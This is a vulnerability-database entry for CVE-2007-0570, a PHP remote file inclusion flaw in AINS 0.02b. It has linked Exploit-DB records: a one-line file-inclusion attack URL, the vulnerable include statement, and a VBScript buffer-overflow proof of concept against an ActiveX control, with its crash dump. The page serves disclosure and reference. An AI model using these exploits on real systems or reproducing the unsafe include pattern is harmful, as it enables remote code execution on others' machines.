CVE-2007-0570
Published 2007-01-30
Priority: P3 41 · high · CVSS 2.0: 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.67% (83.9th percentile)
PHP remote file inclusion vulnerability in ains_main.php in Johannes Gijsbers (aka Taradino) Ad Fundum Integratable News Script (AINS) 0.02b allows remote attackers to execute arbitrary PHP code via a URL in the ains_path parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| johannes_gijsbers | ad_fundum_integratable_news_script | — | — |
No detection rules found.
Exploit-DB
Clever Database Comparer ActiveX 2.2 - Remote Buffer Overflow (PoC)
exploitdb·2007-05-14 · CVE-2007-2648
---
2007/05/14
Clever Database Comparer ActiveX version 2.2 Remote Buffer Overflow Exploit
url: http://www.clevercomponents.com/home/news.asp
price: from $49.99 to $149.19
author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
All software that uses this ocx is vulnerable to these exploits.
```vbscript
Sub tryMe
buff = String(2000,"A")
test.ConnectToDatabase buff,"default", "default", "default", "default"
End Sub
```
faultmon dump:
```
12:58:35.492 pid=0570 tid=07FC EXCEPTION (first-chance)
Exception C0000005 (ACCESS_VIOLATION reading [41414141])
EAX=01D04141: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
EBX=41418282: ?? ??
```
Exploit-DB
AINS 0.02b - 'ains_main.php?ains_path' Remote File Inclusion
exploitdb·2007-01-26 · CVE-2007-0570
---
AINS 0.02b - Remote File Include Vulnerabilities
Download: http://puzzle.dl.sourceforge.net/sourceforge/wassup/AINS002beta.zip
Found by ThE dE@Th
Greetings For: AsB-May Team & HaCk.eGy
ains_main.php:
```php
include("$ains_path/ains_global.inc");
```
http://www.site.com/[path]/ains_main.php?ains_path=[evil_code]
# milw0rm.com [2007-01-26]
No writeups or analysis indexed.
http://osvdb.org/36620
http://www.securityfocus.com/bid/22259
http://www.vupen.com/english/advisories/2007/0384
https://exchange.xforce.ibmcloud.com/vulnerabilities/31850
https://www.exploit-db.com/exploits/3202
Published: 2007-01-30